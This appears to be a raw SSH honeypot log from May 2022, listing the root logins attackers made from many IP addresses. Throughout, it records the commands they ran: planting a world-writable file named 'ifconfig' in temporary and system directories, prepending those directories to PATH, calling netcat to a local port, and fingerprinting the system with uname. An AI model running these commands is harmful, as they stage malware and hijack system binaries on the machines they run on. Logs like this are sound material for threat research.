/root/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig From 187.6.3.3 17-May-2022 19:55:01 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig From 36.153.85.51 17-May-2022 20:38:25 ssh2 root Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig From 14.36.38.99 17-May-2022 21:02:18 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec (uname -smr || /bin/uname -smr || /usr/bin/uname -smr) (uname -smr || /bin/uname -smr || /usr/bin/uname -smr) From 124.223.208.121 17-May-2022 21:10:33 ssh2 root Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig From 45.179.91.154 17-May-2022 21:23:47 ssh2 root Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 185.210.144.122 17-May-2022 21:37:16 ssh2 root echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig From 139.59.135.142 17-May-2022 21:37:27 ssh2 root Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 36.153.85.51 17-May-2022 21:47:14 ssh2 root Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig From 222.110.210.66 17-May-2022 21:47:41 ssh2 root Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 193.194.91.166 17-May-2022 21:55:20 ssh2 root Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig From 5.28.139.161 17-May-2022 22:04:41 ssh2 root Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig From 83.66.33.75 17-May-2022 22:19:21 ssh2 root Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 173.82.30.96 17-May-2022 22:28:40 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig From 92.205.21.38 17-May-2022 22:35:09 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig From 223.171.91.161 17-May-2022 22:42:19 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 31.223.111.253 17-May-2022 22:47:50 ssh2 root Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 175.178.251.145 17-May-2022 22:54:19 ssh2 root Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 84.23.32.54 17-May-2022 23:29:35 ssh2 root Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig From 144.217.5.204 17-May-2022 23:29:52 ssh2 root Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig From 147.182.233.56 17-May-2022 23:30:06 ssh2 root Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 52.131.32.110 17-May-2022 23:30:12 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig From 139.209.222.134 17-May-2022 23:30:25 ssh2 root Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig From 84.204.148.99 17-May-2022 23:37:55 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 173.19.149.215 17-May-2022 23:52:50 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig From 31.19.237.170 18-May-2022 00:00:33 ssh2 root Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig From 223.171.91.149 18-May-2022 00:10:45 ssh2 root Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig From 147.182.233.56 18-May-2022 00:40:57 ssh2 root Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig From 209.216.177.238 18-May-2022 00:46:51 ssh2 root Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig From 223.171.91.150 18-May-2022 00:55:07 ssh2 root Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 125.94.202.100 18-May-2022 01:08:24 ssh2 root Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig From 117.54.14.169 18-May-2022 01:12:57 ssh2 root Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig From 129.154.55.234 18-May-2022 01:29:13 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 64.98.86.50 18-May-2022 01:32:22 ssh2 root Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig From 38.75.229.170 18-May-2022 01:32:22 ssh2 root chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig From 13.87.67.199 18-May-2022 01:38:26 ssh2 root Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig From 160.120.129.184 18-May-2022 01:42:33 ssh2 root Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 223.99.166.104 18-May-2022 01:42:50 ssh2 root Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig From 71.131.225.150 18-May-2022 01:43:12 ssh2 root Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig From 159.65.242.113 18-May-2022 01:52:36 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig From 46.170.151.34 18-May-2022 02:00:44 ssh2 root Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig From 185.210.144.122 